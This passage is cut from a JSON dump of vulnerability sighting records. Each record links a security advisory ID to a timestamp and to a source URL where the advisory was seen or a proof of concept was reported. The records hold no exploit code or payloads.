"", "creation_timestamp": "2026-07-12T00:00:42.741421Z"}, {"uuid": "7eb650e6-b2c9-4c05-aa07-1037fb556907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RR6P-3PFG-562J", "type": "seen", "source": "https://t.me/securixy_kz/1121", "content": "", "creation_timestamp": "2026-07-13T00:00:18.734993Z"}, {"uuid": "fce525ab-1f14-45f1-80f2-b1c0f791a30b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-83QJ-6FR2-VHQG", "type": "seen", "source": "https://t.me/securixy_kz/1136", "content": "", "creation_timestamp": "2026-07-13T00:00:18.471739Z"}, {"uuid": "8413ee52-c850-483b-ad85-04a9519b4aa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6RF6-F9QG-8V94", "type": "seen", "source": "https://t.me/securixy_kz/1240", "content": "", "creation_timestamp": "2026-07-13T00:00:17.828100Z"}, {"uuid": "bb6308fd-4b43-4bf9-9704-85866a7c736c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "seen", "source": "https://t.me/securixy_kz/1231", "content": "", "creation_timestamp": "2026-07-13T00:00:17.786527Z"}, {"uuid": "46e87f5a-025c-47ad-97c1-573f3d641288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4742-MR57-2R9J", "type": "seen", "source": "https://t.me/securixy_kz/1275", "content": "", "creation_timestamp": "2026-07-13T00:00:17.623778Z"}, {"uuid": "3902387b-1021-476f-a596-e6b7601fefb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:2363", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1317", "content": "", "creation_timestamp": "2026-07-13T00:00:16.589329Z"}, {"uuid": "d753611e-e486-4655-b37f-629b23d0db95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XX7V-HQXH-CJR9", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1284", "content": "", "creation_timestamp": "2026-07-13T00:00:16.051298Z"}, {"uuid": "88dcad46-bc8c-4230-a09d-38bb9ec538c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62R4-HW23-CC8V", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1282", "content": "", "creation_timestamp": "2026-07-13T00:00:15.939217Z"}, {"uuid": "651142da-486d-40dc-952d-d4fe807ed96f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xpc-pv4p-pm3w", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mqjp6qwla22o", "content": "", "creation_timestamp": "2026-07-13T12:32:45.794055Z"}, {"uuid": "df3b6263-bd6c-465a-8520-761470f4d153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-030", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116912933713310926", "content": "", "creation_timestamp": "2026-07-13T13:36:38.077373Z"}, {"uuid": "d611c3b8-bbbe-48ff-8948-1fdd545d419b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-030", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mqjsqx45tu2v", "content": "", "creation_timestamp": "2026-07-13T13:36:35.439973Z"}, {"uuid": "d2825187-1fe0-4d60-b29d-25fe2b26de0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-030", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mqju3na7dj25", "content": "", "creation_timestamp": "2026-07-13T14:00:27.954118Z"}, {"uuid": "7815e604-5e9d-4425-ba2a-f44874f34771", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxr7-mqhw-9p98", "type": "seen", "source": "https://gist.github.com/alon710/0aa2b5000c5f8b16f18b0419c2e76818", "content": "", "creation_timestamp": "2026-07-14T18:11:53.896978Z"}, {"uuid": "c0f511f7-b4fc-43a6-859b-95cb64930a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xw9q-2mv6-9fr8", "type": "seen", "source": "https://gist.github.com/alon710/8c969173ef01652db3c3dd0115519a9e", "content": "", "creation_timestamp": "2026-07-14T18:41:49.873062Z"}, {"uuid": "db6c7856-65c4-4944-bea5-dce2f81b35b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7mm-9vx7-jm7h", "type": "seen", "source": "https://gist.github.com/alon710/97fd87eaf3ecb37ec75f6abd3050d94a", "content": "", "creation_timestamp": "2026-07-14T19:11:47.328118Z"}, {"uuid": "60b483ae-12a8-4145-81ab-d0c612ffd91a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p433-fp4g-pc2c", "type": "seen", "source": "https://gist.github.com/yuriw/be55c19caff2bacad733b7df0c67de08", "content": "", "creation_timestamp": "2026-07-14T18:52:20.926222Z"}, {"uuid": "63e186dd-f292-4506-839b-c0befb445fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p433-fp4g-pc2c", "type": "seen", "source": "https://gist.github.com/yuriw/cc567f8b243229aaf1def97d7207ea0d", "content": "", "creation_timestamp": "2026-07-14T18:51:32.920024Z"}, {"uuid": "7daaa506-d90d-42f6-a90c-a930788bd670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vvp9-h8p2-xwfc", "type": "seen", "source": "https://gist.github.com/alon710/553eb2089447345d30a93b1881dc2ee5", "content": "", "creation_timestamp": "2026-07-14T19:42:05.109795Z"}, {"uuid": "453a0cff-ea12-4a66-a1a6-504309162a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3v2-xj35-9grx", "type": "seen", "source": "https://gist.github.com/alon710/57f8fdc68fb17b420e33683532c115ad", "content": "", "creation_timestamp": "2026-07-14T20:12:07.033766Z"}, {"uuid": "25f54022-2878-44c2-9504-b8fc9892c36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7rx3-5wx3-5v76", "type": "seen", "source": "https://gist.github.com/alon710/69a35e6d85f7f0c43de5276d0ac08d9d", "content": "", "creation_timestamp": "2026-07-14T20:43:17.536064Z"}, {"uuid": "94833a54-2c67-485c-88df-2724d8aa6f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7rx3-5wx3-5v76", "type": "seen", "source": "https://gist.github.com/alon710/e9ace864fd0fc758277cc4aa4cece6b7", "content": "", "creation_timestamp": "2026-07-14T20:42:32.584280Z"}, {"uuid": "6950b642-48cd-4cc5-a72c-11cbe372777a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9hc2-hjx8-q6pv", "type": "seen", "source": "https://gist.github.com/alon710/2e36d4018e71382099203c9d78e54337", "content": "", "creation_timestamp": "2026-07-15T00:00:00.769622Z"}, {"uuid": "88ce4c95-4b8e-44c8-9cea-58b6eb9933d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3fv-x8vg-qqm4", "type": "seen", "source": "https://gist.github.com/alon710/94e6df27894be3cbbefd9a4426323455", "content": "", "creation_timestamp": "2026-07-15T00:00:00.718549Z"}, {"uuid": "b5788a59-2015-4f47-8611-b46669f11039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PQG7-V6WH-3PFP", "type": "seen", "source": "https://gist.github.com/alon710/5c21af8cb6d4ec1c461f4a0ac7b833d6", "content": "", "creation_timestamp": "2026-07-15T00:00:00.573313Z"}, {"uuid": "b76b7daf-646f-4d36-80eb-e9fc293f898d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-006", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116924433303774121", "content": "", "creation_timestamp": "2026-07-15T14:21:07.183589Z"}, {"uuid": "3d9e83d2-cdb6-4dd2-aa20-77aefe5cfcf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v8pv-4842-x354", "type": "seen", "source": "https://gist.github.com/alon710/d0ed93c28f268e6b433624aa592c6856", "content": "", "creation_timestamp": "2026-09-16T15:32:25.839126Z"}, {"uuid": "b9104adf-7c4a-4b5c-932c-552f005d96ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cv3r-c5h8-f4g5", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvngkaspt42z", "content": "", "creation_timestamp": "2026-09-16T15:14:45.517276Z"}, {"uuid": "466a667f-7570-4927-9ec1-fd60a9992b7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jhw3-9q9r-gc5w", "type": "seen", "source": "https://gist.github.com/Mundi-Xu/99af1b08275fd437cfb79bfe481e68b7", "content": "", "creation_timestamp": "2026-07-15T17:21:51.300649Z"}, {"uuid": "84e5c849-30e4-4723-87f5-e3d538f536a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8q6q-m837-fv64", "type": "seen", "source": "https://gist.github.com/alon710/93e1535b55e3d3a6b392785e4c9401da", "content": "", "creation_timestamp": "2026-07-15T18:32:06.657351Z"}, {"uuid": "548766d3-5593-4224-b86f-7c2e24141aa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xrq-8626-4rwp", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:00:46.707612Z"}, {"uuid": "54a790fb-4336-4914-ac4b-8fcb0dff0723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ppc-4f35-3m26", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:00:46.675685Z"}, {"uuid": "19ebfc11-d197-47c7-9feb-1b78207af8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c4j6-fc7j-m34r", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:00:46.638278Z"}, {"uuid": "282b2bdf-b7cd-4417-9992-77dd6e8957bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-36qx-fr4f-26g5", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:00:46.579679Z"}, {"uuid": "a6c9382e-95f5-43c7-8ea2-411670cdb0d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jr4p-4xjh-fwvw", "type": "seen", "source": "https://gist.github.com/alon710/0bc2e259381309bd98ca630012fce3cb", "content": "", "creation_timestamp": "2026-07-15T19:31:25.181157Z"}, {"uuid": "f4b4a495-c239-4185-934a-3c28ff327e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7fw-mjwx-w883", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:18:31.902619Z"}, {"uuid": "4a9f188d-21d8-491b-a7b0-b9039aca8c95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7fh5-64p2-3v2j", "type": "seen", "source": "https://gist.github.com/rodrigo-arias/52b0854a2e57501b04c4c8d6728a34ea", "content": "", "creation_timestamp": "2026-07-15T19:18:31.811811Z"}, {"uuid": "ca1e336b-b603-4e42-b0ce-dbfce585c965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-16T19:00:16.149569Z"}, {"uuid": "f5082b2c-6c67-4612-b103-65dddbc24ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-16T19:00:15.903860Z"}, {"uuid": "952bebf6-1fe8-4cbc-a03d-d8bf1b5835a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-16T19:00:15.887392Z"}, {"uuid": "0eedc6c4-6c9e-423a-930d-118b2ecd8373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C2H5-PPV9-7VRQ", "type": "seen", "source": "Telegram/iICdo6JkqLQcGiJzEUOva0XUBnrNpqjKkG8FagtyyTeeKdc", "content": "", "creation_timestamp": "2026-07-16T19:00:08.872406Z"}, {"uuid": "c183ec97-6e6b-4ae1-b3aa-6e251640b9f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff9f-jf42-662q", "type": "seen", "source": "https://chaos.social/users/christopherkunz/statuses/116937404931312120", "content": "", "creation_timestamp": "2026-07-17T21:19:56.563426Z"}, {"uuid": "de65e836-cb8e-42ac-91a7-d72beb9dc8bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-18T00:00:41.352971Z"}, {"uuid": "3bd7930b-6d47-4122-adf2-a1af02f316ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-18T00:00:41.330512Z"}, {"uuid": "038f91ab-3d2e-435b-b532-d0ced68f7cfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-18T00:00:41.307413Z"}, {"uuid": "fddaeef0-eebc-476d-b5a8-ace17bdb2761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FF9G-85JQ-R3G3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3317", "content": "", "creation_timestamp": "2026-07-18T00:00:29.603781Z"}, {"uuid": "f63c32c1-36db-4cdb-90c7-e47dca192823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cfcq-76gr-62x8", "type": "seen", "source": "https://bsky.app/profile/releaseport.com/post/3mqzojds3zg2g", "content": "", "creation_timestamp": "2026-07-19T21:03:21.642856Z"}, {"uuid": "f64bbd24-5c1e-47c6-bc1d-e09ed26fe7b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-031", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mr2v5ko7qq2g", "content": "", "creation_timestamp": "2026-07-20T08:34:42.025246Z"}, {"uuid": "7e2be400-e0af-4f92-92b3-3a72db6ab623", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-007", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116951452309188132", "content": "", "creation_timestamp": "2026-07-20T08:52:24.605479Z"}, {"uuid": "5b0cd73b-ec95-4194-9fd6-2cd84611802d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-031", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116951447583526620", "content": "", "creation_timestamp": "2026-07-20T08:51:16.736373Z"}, {"uuid": "75e03d1f-6a0a-47e8-afbe-5a12d553dca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-031", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mr2w2zlyeq2b", "content": "", "creation_timestamp": "2026-07-20T08:51:10.398119Z"}, {"uuid": "2ea2059b-07a1-464d-8afe-425047ddd2df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "seen", "source": "https://t.me/pphm_HackerNews/158", "content": "", "creation_timestamp": "2026-07-21T00:00:09.608592Z"}, {"uuid": "48d903e0-c857-40d9-8aba-b48b89de29da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h95v-h523-3mw8", "type": "seen", "source": "https://gist.github.com/alon710/07f073f92ce20c0890f37523b73f7af8", "content": "", "creation_timestamp": "2026-07-21T00:31:29.009591Z"}, {"uuid": "9cd97bd1-f361-4330-bc7a-e282338d73e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff9f-jf42-662q", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/7/kritische-sicherheitslucken-in-wordpress-updates-verfugbar", "content": "", "creation_timestamp": "2026-07-21T01:00:54.800031Z"}, {"uuid": "a6983d5d-fd79-4a53-872a-cf421640ad7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fpp7-x2x2-2mjf", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/7/kritische-sicherheitslucken-in-wordpress-updates-verfugbar", "content": "", "creation_timestamp": "2026-07-21T01:00:54.728640Z"}, {"uuid": "91d5f5f3-2155-4702-9e69-e1a4b0dba12f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WM3W-8RRP-J577", "type": "seen", "source": "https://gist.github.com/alon710/84075b1c42ed77e39cb61a3601f10615", "content": "", "creation_timestamp": "2026-07-21T01:31:18.746935Z"}, {"uuid": "7b19aaa3-0e72-43fe-8d60-43bd8c2dc4bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f283-ghqc-fg79", "type": "seen", "source": "https://gist.github.com/alon710/2702abf20f9326c55748b684ae709cc9", "content": "", "creation_timestamp": "2026-07-21T02:31:08.254752Z"}, {"uuid": "540f5e1f-8082-491c-b664-55c875b63ad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2g6r-c272-w58r", "type": "seen", "source": "https://gist.github.com/alon710/2d7287fc0fc036130011004bd90ef758", "content": "", "creation_timestamp": "2026-07-21T03:31:30.935318Z"}, {"uuid": "2685da43-0a82-417c-8e26-92d73153544b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8MV7-9C27-98VC", "type": "seen", "source": "https://gist.github.com/alon710/3baf3d34c51a96bcd4a3b1906aa0d17c", "content": "", "creation_timestamp": "2026-07-21T03:31:30.647774Z"}, {"uuid": "15d65b5c-c239-468c-9994-5127af5b2d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8f3q-3jmv-7prw", "type": "seen", "source": "https://gist.github.com/alon710/27956b315c2388b848451081f38450c3", "content": "", "creation_timestamp": "2026-09-16T13:32:29.001266Z"}, {"uuid": "f58692dd-2615-4f0f-bbcd-733a8181398a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fpp7-x2x2-2mjf", "type": "seen", "source": "https://gist.github.com/alon710/8bb76681f888e7031338e0a8853407f6", "content": "", "creation_timestamp": "2026-09-16T13:01:54.568015Z"}, {"uuid": "413b09da-06e4-4c59-9452-f3af22dc7b23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-529g-xq4f-cw38", "type": "seen", "source": "https://gist.github.com/alon710/108624152e69003362bd827cbabc8c78", "content": "", "creation_timestamp": "2026-07-21T04:31:23.804880Z"}, {"uuid": "e5e161b0-327c-4c9e-929b-133fb25952ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HP3V-MFQW-H74C", "type": "seen", "source": "https://gist.github.com/alon710/108624152e69003362bd827cbabc8c78", "content": "", "creation_timestamp": "2026-07-21T04:31:23.708180Z"}, {"uuid": "8d9c2a5f-f037-47b4-9859-38e5e6a10cea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v422-hmwv-36x6", "type": "seen", "source": "https://gist.github.com/alon710/b2e2ae2f4c7c5ec01435305f8e986e39", "content": "", "creation_timestamp": "2026-07-21T05:31:05.582362Z"}, {"uuid": "f2b1bed3-f9ba-4614-81c0-ef52e5a29f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9hw9-ch79-4vh6", "type": "seen", "source": "https://gist.github.com/alon710/c194376028b5fea9d1333b8a7894f724", "content": "", "creation_timestamp": "2026-07-21T06:31:17.303686Z"}, {"uuid": "59154d70-1e44-4e9d-9059-56f5b49cebb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjc4-5qp5-m44j", "type": "seen", "source": "https://gist.github.com/alon710/796ee0a4078a7a835fdac3bedcdff5ad", "content": "", "creation_timestamp": "2026-07-21T07:31:35.034284Z"}, {"uuid": "077bdb2d-fd9c-4a9e-846a-a5a745cfaef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pg7v-jwj7-p798", "type": "seen", "source": "https://gist.github.com/alon710/afd430e951c08264a9a3f3da451132a3", "content": "", "creation_timestamp": "2026-07-21T08:31:39.819311Z"}, {"uuid": "366b82b6-da93-4891-957a-6105a80e9ea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jjj6-mw9f-p565", "type": "seen", "source": "https://gist.github.com/alon710/58614afe66c43fc333bb604ba1de657d", "content": "", "creation_timestamp": "2026-07-21T09:31:09.596833Z"}, {"uuid": "6751dc3e-a5ae-4802-95ae-8ca985df30f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6r8x-57c9-28j4", "type": "seen", "source": "https://gist.github.com/alon710/8369d28698d5eaa2f4badffaca60e4b4", "content": "", "creation_timestamp": "2026-07-21T10:31:21.387389Z"}, {"uuid": "4e812c1e-ac9c-483a-9c93-0d5b051db626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj7v-r99m-22gq", "type": "seen", "source": "https://gist.github.com/alon710/48f3deb1ca1eafb4018fbe6276da18c1", "content": "", "creation_timestamp": "2026-07-21T11:31:12.883669Z"}, {"uuid": "4fbcf5b5-2622-4a61-b0bd-c8fc8aaf6e0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f4gw-2p7v-4548", "type": "seen", "source": 